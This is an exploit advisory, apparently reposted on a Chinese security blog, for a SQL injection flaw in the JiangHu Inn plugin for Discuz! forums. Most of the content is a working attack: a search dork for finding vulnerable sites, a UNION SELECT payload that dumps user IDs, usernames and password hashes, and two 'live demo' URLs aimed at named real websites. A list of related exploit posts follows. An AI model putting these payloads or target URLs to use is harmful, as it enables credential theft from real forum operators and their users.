Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability[Discuz! 江湖客栈插件注入漏洞]
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================
========================[Author]===========================
[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009
========================[Soft Info]======================
Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php
[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
/---------------------------------------------www.zhaohuan.net-------------------------------------------------\
Greetz : Snda Security Team
& Normal is boring - -!
\--------------------------------------------------------------------------------------------------------------/
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/84.html}
只显示10条记录相关文章
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22260, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16868, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14416, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 45713, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50132, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23211, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15927, 评论: 0)
dz~~~~马后炮 (浏览: 10643, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11745, 评论: 0)